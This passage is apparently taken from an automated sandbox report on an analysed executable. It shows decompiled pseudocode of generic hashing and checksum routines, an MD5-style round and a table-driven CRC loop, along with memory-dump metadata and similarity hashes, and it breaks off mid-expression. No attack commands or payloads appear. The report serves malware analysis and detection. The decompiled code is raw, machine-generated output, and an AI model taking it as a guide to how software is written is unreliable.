				_t641 = _t639 + ( !_t562 & _t342 | _t562 & _t601) + 0xd62f105d +  *((intOrPtr*)(_t692 + 0x34)) + _t601;
				asm("rol edx, 0x9");
				_t564 = _t562 + ( !_t342 & _t601 | _t342 & _t641) + 0x2441453 +  *((intOrPtr*)(_t692 + 0x48)) + _t641;
				asm("rol ebx, 0xe");
				_t344 = _t342 + ( !_t601 & _t641 | _t564 & _t601) + 0xd8a1e681 +  *((intOrPtr*)(_t692 + 0x5c)) + _t564;
				asm("ror edi, 0xc");
				_t603 = _t601 + ( !_t641 & _t564 | _t344 & _t641) + 0xe7d3fbc8 +  *((intOrPtr*)(_t692 + 0x30)) + _t344;
				asm("rol esi, 0x5");
				_t643 = _t641 + ( !_t564 & _t344 | _t564 & _t603) + 0x21e1cde6 +  *((intOrPtr*)(_t692 + 0x44)) + _t603;
				asm("rol ebp, 0x9");
				_t685 = ( !_t344 & _t603 | _t344 & _t643) + 0xc33707d6 +  *((intOrPtr*)(_t692 + 0x58)) + _t564 + _t643;
				asm("rol ebx, 0xe");
				_t346 = _t344 + ( !_t603 & _t643 | _t685 & _t603) + 0xf4d50d87 +  *((intOrPtr*)(_t692 + 0x2c)) + _t685;
				asm("ror edi, 0xc");
				_t605 = _t603 + ( !_t643 & _t685 | _t346 & _t643) + 0x455a14ed +  *((intOrPtr*)(_t692 + 0x40)) + _t346;
				 *(_t692 + 0x1c) = _t605;
				asm("rol edx, 0x5");
				_t567 = _t643 - 0x561c16fb +  *(_t692 + 0x54) + ( !_t685 & _t346 | _t685 & _t605) + _t605;
				asm("rol esi, 0x9");
				_t651 = ( !_t346 & _t605 | _t346 & _t567) + 0xfcefa3f8 +  *((intOrPtr*)(_t692 + 0x28)) + _t685 + _t567;
				asm("rol edi, 0xe");
				_t608 = _t346 + 0x676f02d9 + ( !_t605 & _t567 | _t651 & _t605) +  *((intOrPtr*)(_t692 + 0x3c)) + _t651;
				asm("ror ebx, 0xc");
				_t350 =  *(_t692 + 0x1c) + 0x8d2a4c8a + ( !_t567 & _t651 | _t608 & _t567) +  *((intOrPtr*)(_t692 + 0x50)) + _t608;
				asm("rol edx, 0x4");
				_t569 = _t567 + (_t651 ^ _t608 ^ _t350) + 0xfffa3942 +  *((intOrPtr*)(_t692 + 0x34)) + _t350;
				asm("rol esi, 0xb");
				_t653 = _t651 + (_t608 ^ _t350 ^ _t569) + 0x8771f681 +  *((intOrPtr*)(_t692 + 0x40)) + _t569;
				asm("rol edi, 0x10");
				_t610 = _t608 + (_t653 ^ _t350 ^ _t569) + 0x6d9d6122 +  *((intOrPtr*)(_t692 + 0x4c)) + _t653;
				_t521 = _t653 ^ _t610;
				asm("ror ebx, 0x9");
				_t352 = _t350 + (_t521 ^ _t569) + 0xfde5380c +  *((intOrPtr*)(_t692 + 0x58)) + _t610;
				asm("rol edx, 0x4");
				_t571 = _t569 + (_t521 ^ _t352) + 0xa4beea44 +  *(_t692 + 0x24) + _t352;
				asm("rol esi, 0xb");
				_t655 = _t653 + (_t610 ^ _t352 ^ _t571) + 0x4bdecfa9 +  *((intOrPtr*)(_t692 + 0x30)) + _t571;
				asm("rol edi, 0x10");
				_t612 = _t610 + (_t655 ^ _t352 ^ _t571) + 0xf6bb4b60 +  *((intOrPtr*)(_t692 + 0x3c)) + _t655;
				_t526 = _t655 ^ _t612;
				asm("ror ebx, 0x9");
				_t354 = _t352 + (_t526 ^ _t571) + 0xbebfbc70 +  *((intOrPtr*)(_t692 + 0x48)) + _t612;
				asm("rol ebp, 0x4");
				_t688 = _t571 + 0x289b7ec6 +  *(_t692 + 0x54) + (_t526 ^ _t354) + _t354;
				asm("rol esi, 0xb");
				_t657 = _t655 + (_t612 ^ _t354 ^ _t688) + 0xeaa127fa +  *((intOrPtr*)(_t692 + 0x20)) + _t688;
				asm("rol edi, 0x10");
				_t614 = _t612 + (_t657 ^ _t354 ^ _t688) + 0xd4ef3085 +  *((intOrPtr*)(_t692 + 0x2c)) + _t657;
				_t530 = _t657 ^ _t614;
				asm("ror edx, 0x9");
				_t577 = (_t530 ^ _t688) + 0x4881d05 +  *((intOrPtr*)(_t692 + 0x38)) + _t354 + _t614;
				asm("rol ecx, 0x4");
				_t535 = (_t530 ^ _t577) + 0xd9d4d039 +  *((intOrPtr*)(_t692 + 0x44)) + _t688 + _t577;
				asm("rol esi, 0xb");
				_t659 = _t657 + (_t614 ^ _t577 ^ _t535) + 0xe6db99e5 +  *((intOrPtr*)(_t692 + 0x50)) + _t535;
				asm("rol edi, 0x10");
				_t616 = _t614 + (_t659 ^ _t577 ^ _t535) + 0x1fa27cf8 +  *((intOrPtr*)(_t692 + 0x5c)) + _t659;
				asm("ror edx, 0x9");
				_t579 = _t577 + (_t659 ^ _t616 ^ _t535) + 0xc4ac5665 +  *((intOrPtr*)(_t692 + 0x28)) + _t616;
				asm("rol ecx, 0x6");
				_t537 = _t535 + (( !_t659 | _t579) ^ _t616) + 0xf4292244 +  *((intOrPtr*)(_t692 + 0x20)) + _t579;
				asm("rol esi, 0xa");
				_t661 = _t659 + (( !_t616 | _t537) ^ _t579) + 0x432aff97 +  *((intOrPtr*)(_t692 + 0x3c)) + _t537;
				asm("rol edi, 0xf");
				_t618 = _t616 + (( !_t579 | _t661) ^ _t537) + 0xab9423a7 +  *((intOrPtr*)(_t692 + 0x58)) + _t661;
				asm("ror edx, 0xb");
				_t581 = _t579 + (( !_t537 | _t618) ^ _t661) + 0xfc93a039 +  *((intOrPtr*)(_t692 + 0x34)) + _t618;
				asm("rol ecx, 0x6");
				_t539 = _t537 + (( !_t661 | _t581) ^ _t618) + 0x655b59c3 +  *((intOrPtr*)(_t692 + 0x50)) + _t581;
				asm("rol esi, 0xa");
				_t663 = _t661 + (( !_t618 | _t539) ^ _t581) + 0x8f0ccc92 +  *((intOrPtr*)(_t692 + 0x2c)) + _t539;
				asm("rol edi, 0xf");
				_t620 = _t618 + (( !_t581 | _t663) ^ _t539) + 0xffeff47d +  *((intOrPtr*)(_t692 + 0x48)) + _t663;
				asm("ror edx, 0xb");
				_t583 = _t581 + (( !_t539 | _t620) ^ _t663) + 0x85845dd1 +  *(_t692 + 0x24) + _t620;
				asm("rol ecx, 0x6");
				_t541 = _t539 + (( !_t663 | _t583) ^ _t620) + 0x6fa87e4f +  *((intOrPtr*)(_t692 + 0x40)) + _t583;
				asm("rol ebx, 0xa");
				_t357 = _t663 - 0x1d31920 + (( !_t620 | _t541) ^ _t583) +  *((intOrPtr*)(_t692 + 0x5c)) + _t541;
				asm("rol edi, 0xf");
				_t622 = _t620 + (( !_t583 | _t357) ^ _t541) + 0xa3014314 +  *((intOrPtr*)(_t692 + 0x38)) + _t357;
				asm("ror ebp, 0xb");
				_t691 = _t583 + 0x4e0811a1 +  *(_t692 + 0x54) + (( !_t541 | _t622) ^ _t357) + _t622;
				_t623 =  *((intOrPtr*)(_t692 + 0x64));
				asm("rol esi, 0x6");
				_t666 = _t541 - 0x8ac817e + (( !_t357 | _t691) ^ _t622) +  *((intOrPtr*)(_t692 + 0x30)) + _t691;
				asm("rol edx, 0xa");
				_t586 = _t357 - 0x42c50dcb + (( !_t622 | _t666) ^ _t691) +  *((intOrPtr*)(_t692 + 0x4c)) + _t666;
				asm("rol ecx, 0xf");
				_t544 = _t622 + 0x2ad7d2bb + (( !_t691 | _t586) ^ _t666) +  *((intOrPtr*)(_t692 + 0x28)) + _t586;
				 *_t623 =  *((intOrPtr*)(_t692 + 0x10)) + _t666;
				 *((intOrPtr*)(_t623 + 8)) =  *((intOrPtr*)(_t623 + 8)) + _t544;
				asm("ror eax, 0xb");
				_t328 = _t691 - 0x14792c6f + (( !_t666 | _t544) ^ _t586) +  *((intOrPtr*)(_t692 + 0x44)) +  *((intOrPtr*)(_t623 + 4)) + _t544;
				 *((intOrPtr*)(_t623 + 0xc)) =  *((intOrPtr*)(_t623 + 0xc)) + _t586;
				 *((intOrPtr*)(_t623 + 4)) = _t328;
				return _t328;
			}



















































































                                        0x0040cebb
                                        0x0040cec7
                                        0x0040ceca
                                        0x0040cecd
                                        0x0040ced7
                                        0x0040cedb
                                        0x0040cedf
                                        0x0040cee3
                                        0x0040cee4
                                        0x0040cee4
                                        0x0040cee8
                                        0x0040ceeb
                                        0x0040cf05
                                        0x0040cf07
                                        0x0040cf0a
                                        0x0040cf0a
                                        0x0040cf0d
                                        0x0040cf3b
                                        0x0040cf3e
                                        0x0040cf50
                                        0x0040cf53
                                        0x0040cf6f
                                        0x0040cf72
                                        0x0040cf86
                                        0x0040cf89
                                        0x0040cfa3
                                        0x0040cfa6
                                        0x0040cfbe
                                        0x0040cfc1
                                        0x0040cfdb
                                        0x0040cfde
                                        0x0040d000
                                        0x0040d003
                                        0x0040d01d
                                        0x0040d020
                                        0x0040d02c
                                        0x0040d03e
                                        0x0040d041
                                        0x0040d057
                                        0x0040d05a
                                        0x0040d05e
                                        0x0040d078
                                        0x0040d07b
                                        0x0040d07f
                                        0x0040d093
                                        0x0040d096
                                        0x0040d09a
                                        0x0040d0b2
                                        0x0040d0b5
                                        0x0040d0b9
                                        0x0040d0d7
                                        0x0040d0da
                                        0x0040d0e0
                                        0x0040d0fc
                                        0x0040d0ff
                                        0x0040d11c
                                        0x0040d11f
                                        0x0040d133
                                        0x0040d136
                                        0x0040d14e
                                        0x0040d153
                                        0x0040d16d
                                        0x0040d172
                                        0x0040d188
                                        0x0040d18d
                                        0x0040d1a5
                                        0x0040d1aa
                                        0x0040d1c2
                                        0x0040d1c7
                                        0x0040d1e5
                                        0x0040d1ea
                                        0x0040d202
                                        0x0040d207
                                        0x0040d221
                                        0x0040d224
                                        0x0040d23c
                                        0x0040d241
                                        0x0040d259
                                        0x0040d25e
                                        0x0040d264
                                        0x0040d272
                                        0x0040d275
                                        0x0040d293
                                        0x0040d296
                                        0x0040d2b6
                                        0x0040d2bb
                                        0x0040d2cf
                                        0x0040d2d2
                                        0x0040d2e5
                                        0x0040d2e8
                                        0x0040d2f7
                                        0x0040d2fa
                                        0x0040d30f
                                        0x0040d312
                                        0x0040d314
                                        0x0040d327
                                        0x0040d32a
                                        0x0040d33c
                                        0x0040d33f
                                        0x0040d34e
                                        0x0040d357
                                        0x0040d36c
                                        0x0040d36f
                                        0x0040d371
                                        0x0040d384
                                        0x0040d387
                                        0x0040d393
                                        0x0040d396
                                        0x0040d3a5
                                        0x0040d3a8
                                        0x0040d3bd
                                        0x0040d3c0
                                        0x0040d3c2
                                        0x0040d3d6
                                        0x0040d3d9
                                        0x0040d3eb
                                        0x0040d3ee
                                        0x0040d3fd
                                        0x0040d400
                                        0x0040d415
                                        0x0040d418
                                        0x0040d42b
                                        0x0040d42e
                                        0x0040d445
                                        0x0040d448
                                        0x0040d45d
                                        0x0040d460
                                        0x0040d475
                                        0x0040d478
                                        0x0040d48d
                                        0x0040d490
                                        0x0040d4a5
                                        0x0040d4a8
                                        0x0040d4bd
                                        0x0040d4c0
                                        0x0040d4d5
                                        0x0040d4d8
                                        0x0040d4ed
                                        0x0040d4f0
                                        0x0040d503
                                        0x0040d506
                                        0x0040d52a
                                        0x0040d52d
                                        0x0040d548
                                        0x0040d54b
                                        0x0040d55d
                                        0x0040d564
                                        0x0040d574
                                        0x0040d578
                                        0x0040d57b
                                        0x0040d58b
                                        0x0040d58e
                                        0x0040d5a0
                                        0x0040d5a3
                                        0x0040d5a5
                                        0x0040d5a7
                                        0x0040d5bc
                                        0x0040d5c2
                                        0x0040d5c4
                                        0x0040d5c7
                                        0x0040d5d1

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                        • Instruction ID: 78d1286464c28b59f50c0471846df8dab8ef94cdfaa31437b890ee88635ca35a
                                        • Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                        • Instruction Fuzzy Hash: 6312C5B3B546144BD70CCE5DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410990, Relevance: .2, Instructions: 209COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00410990() {
				signed int _t98;
				signed char _t103;
				signed char _t150;
				unsigned int _t152;
				signed char _t167;
				signed int _t178;
				signed int _t213;
				signed int* _t257;
				signed char* _t258;
				unsigned int _t259;
				unsigned int _t262;
				void* _t264;

				_t214 =  *(_t264 + 4);
				_t150 =  *(_t264 + 0xc);
				_t259 =  *(_t264 + 0x14);
				_t98 =  !((( *(_t264 + 4) & 0x0000ff00) + ( *(_t264 + 4) << 0x10) << 8) + (_t214 >> 0x00000008 & 0x0000ff00) + (_t214 >> 0x18));
				if(_t259 != 0) {
					while((_t150 & 0x00000003) != 0) {
						_t213 =  *_t150 & 0x000000ff;
						_t150 = _t150 + 1;
						_t98 = _t98 << 0x00000008 ^  *(0x4151d0 + (_t98 >> 0x00000018 ^ _t213) * 4);
						_t259 = _t259 - 1;
						if(_t259 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				_t257 = _t150 - 4;
				if(_t259 >= 0x20) {
					_t262 = _t259 >> 5;
					do {
						_t248 =  *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4151d0 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 